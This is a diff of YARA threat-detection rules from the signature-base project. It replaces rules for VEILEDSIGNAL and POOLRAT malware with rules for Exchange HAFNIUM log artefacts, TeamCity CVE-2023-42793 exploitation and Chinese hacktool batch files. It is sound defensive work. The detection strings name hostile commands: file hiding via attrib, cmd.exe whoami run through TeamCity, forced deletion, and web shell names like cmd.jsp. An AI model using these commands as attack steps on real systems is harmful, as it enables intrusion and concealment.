+		$x2 = "cmd.exe /c cd /d C:\\inetpub\\wwwroot\\aspnet_client" ascii wide
+		$s1 = "aspnet_client&del '"
+		$s2 = "aspnet_client&attrib +h +s +r "
+		$s3 = "&echo [S]"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		1 of ( $x* ) or 2 of them
 }
-rule SIGNATURE_BASE_SUSP_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23
+rule SIGNATURE_BASE_EXPL_LOG_CVE_2021_27055_Exchange_Forensic_Artefacts : LOG
 {
 	meta:
-		description = "Detects marker found in VEILEDSIGNAL backdoor"
-		author = "X__Junior"
-		id = "8f0d92b6-d9b0-55e3-b2ca-601d095f5279"
-		date = "2023-04-20"
-		modified = "2023-04-21"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L19-L35"
+		description = "Detects suspicious log entries that indicate requests as described in reports on HAFNIUM activity"
+		author = "Zach Stanford - @svch0st, Florian Roth"
+		id = "8b0110a9-fd03-5f7d-bdd8-03ff48bcac68"
+		date = "2021-03-10"
+		modified = "2021-03-15"
+		reference = "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium_log_sigs.yar#L67-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ccb482a7634dc24fde03b5730bf28a9e028f8d5a9ad46ba9663d1b520264d8f4"
-		score = 75
-		quality = 85
-		tags = ""
-		hash1 = "aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43"
+		logic_hash = "131ff0ce189dfeace0922000b0d15dfb5a1270bee8fba8e4d66aa75b1d3f864f"
+		score = 65
+		quality = 60
+		tags = "LOG"
 
 	strings:
-		$opb1 = { 81 BD ?? ?? ?? ?? 5E DA F3 76}
-		$opb2 = { C7 85 ?? ?? ?? ?? 74 F2 39 DA 66 C7 85 ?? ?? ?? ?? E5 CF}
-		$opb3 = { C7 85 ?? ?? ?? ?? 74 F2 39 DA B9 00 04 00 00 66 C7 85 ?? ?? ?? ?? E5 CF }
+		$x1 = "ServerInfo~" ascii wide
+		$sr1 = /\/ecp\/[0-9a-zA-Z]{1,3}\.js/ ascii wide
+		$s1 = "/ecp/auth/w.js" ascii wide
+		$s2 = "/owa/auth/w.js" ascii wide
+		$s3 = "/owa/auth/x.js" ascii wide
+		$s4 = "/ecp/main.css" ascii wide
+		$s5 = "/ecp/default.flt" ascii wide
+		$s6 = "/owa/auth/Current/themes/resources/logon.css" ascii wide
 
 	condition:
-		2 of them
+		$x1 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_1 : FILE
+rule SIGNATURE_BASE_LOG_CVE_2021_27065_Exchange_Forensic_Artefacts_Mar21_2 : LOG
 {
 	meta:
-		description = "Detects VEILEDSIGNAL malware"
-		author = "Mandiant"
-		id = "3e7c92fe-a7bd-5180-9935-4f98f2b64e2b"
-		date = "2023-04-20"
+		description = "Detects suspicious log entries that indicate requests as described in reports on HAFNIUM activity"
+		author = "Florian Roth (Nextron Systems)"
+		id = "37a26def-b360-518e-a4ab-9604a5b39afd"
+		date = "2021-03-10"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L37-L55"
+		reference = "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium_log_sigs.yar#L92-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "439a201e6a44a00a31fd13efc83a1acf858a52201e3ab48d5cf095bae1e48cf7"
-		score = 75
+		logic_hash = "13e2e46689bc0e87c3cf13dc2ce213c384afe6c03c21e62a467974a0518c12da"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
-		hash1 = "404b09def6054a281b41d309d809a428"
-		hash2 = "c6441c961dcad0fe127514a918eaabd4"
+		tags = "LOG"
 
 	strings:
-		$rh1 = { 68 5D 7A D2 2C 3C 14 81 2C 3C 14 81 2C 3C 14 81 77 54 10 80 26 3C 14 81 77 54 17 80 29 3C 14 81 77 54 11 80 AB 3C 14 81 D4 4C 11 80 33 3C 14 81 D4 4C 10 80 22 3C 14 81 D4 4C 17 80 25 3C 14 81 77 54 15 80 27 3C 14 81 2C 3C 15 81 4B 3C 14 81 94 4D 1D 80 28 3C 14 81 94 4D 14 80 2D 3C 14 81 94 4D 16 80 2D 3C 14 81 }
-		$rh2 = { 00 E5 A0 2B 44 84 CE 78 44 84 CE 78 44 84 CE 78 1F EC CA 79 49 84 CE 78 1F EC CD 79 41 84 CE 78 1F EC CB 79 C8 84 CE 78 BC F4 CA 79 4A 84 CE 78 BC F4 CD 79 4D 84 CE 78 BC F4 CB 79 65 84 CE 78 1F EC CF 79 43 84 CE 78 44 84 CF 78 22 84 CE 78 FC F5 C7 79 42 84 CE 78 FC F5 CE 79 45 84 CE 78 FC F5 CC 79 45 84 CE 78}
-		$rh3 = { DA D2 21 22 9E B3 4F 71 9E B3 4F 71 9E B3 4F 71 C5 DB 4C 70 94 B3 4F 71 C5 DB 4A 70 15 B3 4F 71 C5 DB 4B 70 8C B3 4F 71 66 C3 4B 70 8C B3 4F 71 66 C3 4C 70 8F B3 4F 71 C5 DB 49 70 9F B3 4F 71 66 C3 4A 70 B0 B3 4F 71 C5 DB 4E 70 97 B3 4F 71 9E B3 4E 71 F9 B3 4F 71 26 C2 46 70 9F B3 4F 71 26 C2 B0 71 9F B3 4F 71 9E B3 D8 71 9F B3 4F 71 26 C2 4D 70 9F B3 4F 71 }
-		$rh4 = { CB 8A 35 66 8F EB 5B 35 8F EB 5B 35 8F EB 5B 35 D4 83 5F 34 85 EB 5B 35 D4 83 58 34 8A EB 5B 35 D4 83 5E 34 09 EB 5B 35 77 9B 5E 34 92 EB 5B 35 77 9B 5F 34 81 EB 5B 35 77 9B 58 34 86 EB 5B 35 D4 83 5A 34 8C EB 5B 35 8F EB 5A 35 D3 EB 5B 35 37 9A 52 34 8C EB 5B 35 37 9A 58 34 8E EB 5B 35 37 9A 5B 34 8E EB 5B 35 37 9A 59 34 8E EB 5B 35 }
+		$sr1 = /GET \/rpc\/ &CorrelationID=<empty>;&RequestId=[^\n]{40,600} (200|301|302)/
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and 1 of ( $rh* )
+		$sr1
 }
-rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_2 : FILE
+rule SIGNATURE_BASE_LOG_EXPL_SUSP_Teamcity_CVE_2023_42793_Oct23_1 : CVE_2023_42793
 {
 	meta:
-		description = "Detects VEILEDSIGNAL malware"
-		author = "Mandiant"
-		id = "1b96c2f0-1c57-593e-9630-a72d43eb857e"
-		date = "2023-04-20"
+		description = "Detects log entries that could indicate a successful exploitation of CVE-2023-42793 on TeamCity servers"
+		author = "Florian Roth"
+		id = "81c04863-72aa-5515-889e-3ef718360cac"
+		date = "2023-10-02"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L57-L76"
+		reference = "https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_teamcity_2023_42793.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "62f74faa8f136f4dc63a4b703cffcb97b438cc4f180d5d127d1fc4b86d3cd1d1"
-		score = 75
+		logic_hash = "3b6c8e3e3ff91563899ca94904a56460cd702a3e58e0aacf1c3acb506ec3f959"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
-		hash1 = "404b09def6054a281b41d309d809a428"
+		tags = "CVE-2023-42793"
 
 	strings:
-		$sb1 = { C1 E0 05 4D 8? [2] 33 D0 45 69 C0 7D 50 BF 12 8B C2 41 FF C2 C1 E8 07 33 D0 8B C2 C1 E0 16 41 81 C0 87 D6 12 00 }
-		$si1 = "CryptBinaryToStringA" fullword
-		$si2 = "BCryptGenerateSymmetricKey" fullword
-		$si3 = "CreateThread" fullword
-		$ss1 = "ChainingModeGCM" wide
-		$ss2 = "__tutma" fullword
+		$sa1 = "File edited: "
+		$sa2 = "\\TeamCity\\config\\internal.properties by user with id="
+		$sb1 = "s.buildServer.ACTIVITIES.AUDIT - server_file_change: File "
+		$sb2 = "\\TeamCity\\config\\internal.properties was modified by \"user with id"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		all of ( $sa* ) or all of ( $sb* )
 }
-rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_3 : FILE
+rule SIGNATURE_BASE_LOG_EXPL_SUSP_Teamcity_Oct23_1
 {
 	meta:
-		description = "Detects VEILEDSIGNAL malware"
-		author = "Mandiant"
-		id = "82790c65-1d93-509b-95df-841543943c30"
-		date = "2023-04-20"
+		description = "Detects log entries that could indicate a successful exploitation of TeamCity servers"
+		author = "Florian Roth"
+		id = "4845b40a-cf77-53ae-b2fa-d1ed861153f2"
+		date = "2023-10-02"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L78-L96"
+		reference = "https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_teamcity_2023_42793.yar#L20-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c6441c961dcad0fe127514a918eaabd4"
-		logic_hash = "2109340edfb1891baef5bd92ba3c9da77f891341de9e8094060a649de62fade2"
-		score = 75
+		logic_hash = "a2f0abffb9c72e6b32875310e5af7365b6cab4e6c4f6188daa3085b57c38ed0e"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
+		tags = ""
 
 	strings:
-		$ss1 = { 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6A 73 6F 6E 2C 20 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 2C 20 2A 2F 2A 3B 20 71 3D 30 2E 30 31 00 00 61 63 63 65 70 74 00 00 65 6E 2D 55 53 2C 65 6E 3B 71 3D 30 2E 39 00 00 61 63 63 65 70 74 2D 6C 61 6E 67 75 61 67 65 00 63 6F 6F 6B 69 65 00 00 }
-		$si1 = "HttpSendRequestW" fullword
-		$si2 = "CreateNamedPipeW" fullword
-		$si3 = "CreateThread" fullword
-		$se1 = "DllGetClassObject" fullword
+		$a1 = "tbrains.buildServer.ACTIVITIES"
+		$s1 = "External process is launched by user user with id"
+		$s2 = ". Command line: cmd.exe \"/c whoami"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_4 : FILE
+rule SIGNATURE_BASE_CN_Tools_Xbat : FILE
 {
 	meta:
-		description = "Detects VEILEDSIGNAL malware"
-		author = "Mandiant"
-		id = "379e6471-3c4f-5c72-b8fd-17f481e89ac6"
-		date = "2023-04-20"
+		description = "Chinese Hacktool Set - file xbat.vbs"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5b2f0d2e-a7fb-5f5a-94a9-28e851c9756e"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L98-L118"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktool_scripts.yar#L10-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2a875c39a43ff054ed5a6cf2fa1f17c2adc189452582763db8ceddfa652abfbf"
+		hash = "a7005acda381a09803b860f04d4cae3fdb65d594"
+		logic_hash = "c6dae76bbda7b43eef348c61e1330405923baf724f1aa5d2b51132dde89248fe"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
-		hash1 = "404b09def6054a281b41d309d809a428"
-		hash2 = "c6441c961dcad0fe127514a918eaabd4"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sb1 = { FF 15 FC 76 01 00 8B F0 85 C0 74 ?? 8D 50 01 [6-16] FF 15 [4] 48 8B D8 48 85 C0 74 ?? 89 ?? 24 28 44 8B CD 4C 8B C? 48 89 44 24 20 }
-		$sb2 = { 33 D2 33 C9 FF 15 [4] 4C 8B CB 4C 89 74 24 28 4C 8D 05 [2] FF FF 44 89 74 24 20 33 D2 33 C9 FF 15 }
-		$si1 = "CreateThread" fullword
-		$si2 = "MultiByteToWideChar" fullword
-		$si3 = "LocalAlloc" fullword
-		$se1 = "DllGetClassObject" fullword
+		$s0 = "ws.run \"srss.bat /start\",0 " fullword ascii
+		$s1 = "Set ws = Wscript.CreateObject(\"Wscript.Shell\")" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		uint16( 0 ) == 0x6553 and filesize < 0KB and all of them
 }
-rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_5 : FILE
+rule SIGNATURE_BASE_CN_Tools_Temp : FILE
 {
 	meta:
-		description = "Detects VEILEDSIGNAL malware"
-		author = "Mandiant"
-		id = "7d0718fc-4f1c-5293-8dc4-81a5783fbfb2"
-		date = "2023-04-20"
+		description = "Chinese Hacktool Set - file Temp.war"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4fbaabd0-fbf2-56a0-94af-9deba1e7cc81"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L120-L143"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktool_scripts.yar#L26-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5d43b8198ad224bee8d290dd7031d73f76a7d957a2e3b44d89e7aaf5f2c94c65"
+		hash = "c3327ef63b0ed64c4906e9940ef877c76ebaff58"
+		logic_hash = "05fd1cb3f7c8b96ccf824013c130a0b21f43724463f8658e23239d009be7f4fe"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
-		hash1 = "6727284586ecf528240be21bb6e97f88"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sb1 = { 48 8D 15 [4] 48 8D 4C 24 4C E8 [4] 85 C0 74 ?? 48 8D 15 [4] 48 8D 4C 24 4C E8 [4] 85 C0 74 ?? 48 8D 15 [4] 48 8D 4C 24 4C E8 [4] 85 C0 74 ?? 48 8D [3] 48 8B CB FF 15 [4] EB }
-		$ss1 = "chrome.exe" wide fullword
-		$ss2 = "firefox.exe" wide fullword
-		$ss3 = "msedge.exe" wide fullword
-		$ss4 = "\\\\.\\pipe\\*" ascii fullword
-		$ss5 = "FindFirstFileA" ascii fullword
-		$ss6 = "Process32FirstW" ascii fullword
-		$ss7 = "RtlAdjustPrivilege" ascii fullword
-		$ss8 = "GetCurrentProcess" ascii fullword
-		$ss9 = "NtWaitForSingleObject" ascii fullword
+		$s0 = "META-INF/context.xml<?xml version=\"1.0\" encoding=\"UTF-8\"?>" fullword ascii
+		$s1 = "browser.jsp" fullword ascii
+		$s3 = "cmd.jsp" fullword ascii
+		$s4 = "index.jsp" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		uint16( 0 ) == 0x4b50 and filesize < 203KB and all of them
 }
-rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_6 : FILE
+rule SIGNATURE_BASE_CN_Tools_Srss : FILE
 {
 	meta:
-		description = "Detects VEILEDSIGNAL malware"
-		author = "Mandiant"
-		id = "2cbedbc0-d465-5674-bf9c-9362003eb8d2"
-		date = "2023-04-20"
+		description = "Chinese Hacktool Set - file srss.bat"
+		author = "Florian Roth (Nextron Systems)"
+		id = "13191e2e-fbcd-5e0b-af55-cc10f2583c1b"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L145-L164"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktool_scripts.yar#L44-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d3b1e5f7a6b73fc4cdc5abe19a412130cde33c2d52c0ad78256b865e018e3794"
+		hash = "092ab0797947692a247fe80b100fb4df0f9c37a0"
+		logic_hash = "e01fd60adc32be26b0940ecc127a17bfcfe2ebfcf6cefea76ba6adc61d3c18d4"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
-		hash1 = "00a43d64f9b5187a1e1f922b99b09b77"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ss1 = "C:\\Programdata\\" wide
-		$ss2 = "devobj.dll" wide fullword
-		$ss3 = "msvcr100.dll" wide fullword
-		$ss4 = "TpmVscMgrSvr.exe" wide fullword
-		$ss5 = "\\Microsoft\\Windows\\TPM" wide fullword
-		$ss6 = "CreateFileW" ascii fullword
+		$s0 = "srss.exe -idx 0 -ip"
+		$s1 = "-port 21 -logfilter \"_USER ,_P" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+		filesize < 100 and all of them
 }
-rule SIGNATURE_BASE_SUSP_NK_MAL_M_Hunting_POOLRAT
+rule SIGNATURE_BASE_Dll_Unreg : FILE
 {
 	meta:
-		description = "Detects strings found in POOLRAT malware"
-		author = "Mandiant"
-		id = "70f5f3a0-0fd0-54dc-97cc-4f3c35f02fcd"
-		date = "2023-04-20"
+		description = "Chinese Hacktool Set - file UnReg.bat"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5c14486d-72a2-5a18-9db0-ce0ab61fdce7"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		old_rule_name = "APT_NK_MAL_M_Hunting_POOLRAT"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L166-L202"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktool_scripts.yar#L60-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ac8db844a9c4ed961930417809afb706ea948c4509a4be1eaeed77f09c86069d"
-		score = 70
-		quality = 83
-		tags = ""
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
-		hash1 = "451c23709ecd5a8461ad060f6346930c"
+		hash = "d5e24ba86781c332d0c99dea62f42b14e893d17e"
+		logic_hash = "0e534e475a5b4338aa53bea09325dd63a3d451a13b46a70b5208cabd2deecabe"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "name=\"uid\"%s%s%u%s" ascii wide
-		$s2 = "name=\"session\"%s%s%u%s" ascii wide
-		$s3 = "name=\"action\"%s%s%s%s" ascii wide
-		$s4 = "name=\"token\"%s%s%u%s" ascii wide
-		$str1 = "--N9dLfqxHNUUw8qaUPqggVTpX-" wide ascii nocase
+		$s0 = "regsvr32.exe /u C:\\windows\\system32\\PacketX.dll" fullword ascii
+		$s1 = "del /F /Q C:\\windows\\system32\\PacketX.dll" fullword ascii
 
 	condition:
-		any of ( $s* ) or $str1
+		filesize < 1KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_NK_Tradingtech_Forensicartifacts_Apr23_1 : FILE
+rule SIGNATURE_BASE_Dll_Reg : FILE
 {
 	meta:
-		description = "Detects forensic artifacts, file names and keywords related the Trading Technologies compromise UNC4736"
-		author = "Florian Roth"
-		id = "f79a5321-4f22-52d9-aa83-4aa750ecc036"
-		date = "2023-04-20"
-		modified = "2023-04-21"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L204-L225"
+		description = "Chinese Hacktool Set - file Reg.bat"
+		author = "Florian Roth (Nextron Systems)"
+		id = "97c0d9ff-6a12-57e3-8219-6c1843a03a29"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktool_scripts.yar#L76-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "50329427e56b70335a12f0dde87a36ac95838377482eebab334d252332fe481b"
-		score = 60
+		hash = "cb8a92fe256a3e5b869f9564ecd1aa9c5c886e3f"
+		logic_hash = "db2032d5689f9fcfc446d5ebe8a6d28c6dbd8bcd1d93769ec969d76f8add4f9d"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "www.tradingtechnologies.com/trading/order-management" ascii wide
-		$xf1 = "X_TRADER_r7.17.90p608.exe" ascii wide
-		$xf2 = "\\X_TRADER-ja.mst" ascii wide
-		$xf3 = "C:\\Programdata\\TPM\\TpmVscMgrSvr.exe" ascii wide
-		$xf4 = "C:\\Programdata\\TPM\\winscard.dll" ascii wide
-		$fp1 = "<html"
+		$s0 = "copy PacketX.dll C:\\windows\\system32\\PacketX.dll" fullword ascii
+		$s1 = "regsvr32.exe C:\\windows\\system32\\PacketX.dll" fullword ascii
 
 	condition:
-		not uint16( 0 ) == 0x5025 and 1 of ( $x* ) and not 1 of ( $fp* )
+		filesize < 1KB and all of them
 }
-
-rule SIGNATURE_BASE_SUSP_TH_APT_UNC4736_Tradingtech_Cert_Apr23_1
+rule SIGNATURE_BASE_Sbin_Squid : FILE
 {
 	meta:
-		description = "Threat hunting rule that detects samples signed with the compromised Trading Technologies certificate after May 2022"
-		author = "Florian Roth"
-		id = "9a05fba9-9466-5b69-9207-27ad01d6eb8b"
-		date = "2023-04-20"
+		description = "Chinese Hacktool Set - file squid.bat"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e7302e90-d072-599b-a8f2-bf1f21a84de9"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L227-L242"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktool_scripts.yar#L92-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "47941828b3c18ed39eddacbc73e147651a9bd48e1a0f7b9847ff1d4c6fea6afd"
-		score = 65
+		hash = "8b795a8085c3e6f3d764ebcfe6d59e26fdb91969"
+		logic_hash = "c440bcfda55f926354ea5e462fe1e6a0e9e9585bb1c1539c0aa0588405a46105"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = { 00 85 38 A6 C5 01 8F 50 FC }
-		$s2 = "Go Daddy Secure Certificate Authority - G2"
-		$s3 = "Trading Technologies International, Inc"
+		$s0 = "del /s /f /q" fullword ascii
+		$s1 = "squid.exe -z" fullword ascii
+		$s2 = "net start Squid" fullword ascii
+		$s3 = "net stop Squid" fullword ascii
 
 	condition:
-		pe.timestamp> 1651363200 and all of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_SVG_JS_Payload_Mar25 : FILE
+rule SIGNATURE_BASE_Sql1433_Creck : FILE
 {
 	meta:
-		description = "Detects a suspicious SVG file that contains a JavaScript payload. This rule is a generic rule that might generate false positives. A match should be further investigated."
-		author = "Florian Roth"
-		id = "cdb22283-8427-5c25-b653-d6d76dd27dc6"
-		date = "2025-03-20"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_svg_js_phish_mar25.yar#L3-L37"
+		description = "Chinese Hacktool Set - file creck.bat"
+		author = "Florian Roth (Nextron Systems)"
+		id = "38a91464-d493-5154-86ec-e54b3e25309b"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktool_scripts.yar#L110-L125"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7b4b8e42d4df56412969cd1c38dcb750d21b10a54d257a9b918bd6ae0e0f8d11"
-		hash = "4ae2ebc103f5de7ccfd75603b543d602b5c793e1ef7db19fbb60ff2e42611f75"
-		hash = "b92e9d6f8a516e78b3e848c4b5b2815b406c9478e6be3777f3e784ceedc66f4a"
-		hash = "23ea832d503b02e9edbdbf9ed8ce0b19376d44580d21906d9da834de69f7dfcb"
-		hash = "4f33dff59753773a596798ee58fb899c5382c6ec2951b457554aebe5c05ec0cd"
-		hash = "b8be8e009b08c04857dc2388544d61db57c0dd1841371aa7e4bf3ee2010ef1a8"
-		hash = "cdcbe23f284067c4e863f76370f8612d85bef0410ca0bb5684112a8c16eff21c"
-		hash = "5b3d11109e0d10b9266cbfbb6906e728c4470d752f95769280666d1166df4b43"
-		hash = "a7620155da2a576823dbe7963ff4a5f79702645edb8b2ae67b8af8ba7eac697b"
-		hash = "52e1c6279dc151616bbd85ac7d0abc42cab5850deb6da2e2b20e339f79c3536a"
-		logic_hash = "a9239fd09b656f985b3f930ba7b3ab3999dfcd315010f3bf648fffd5ed0a8834"
-		score = 60
+		hash = "189c11a3b268789a3fbcfac3bd4e03cbfde87b1d"
+		logic_hash = "2d9ff5f130d625450e7de41832695839f0427a6186569280a224f20e89fe1d8a"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "<svg xmlns=" ascii fullword
-		$sx1 = "src=\"data:application/ecmascript;base64,"
-		$sx2 = "=\"></script>"
-		$ss1 = "<script type=\"application/ecmascript\">"
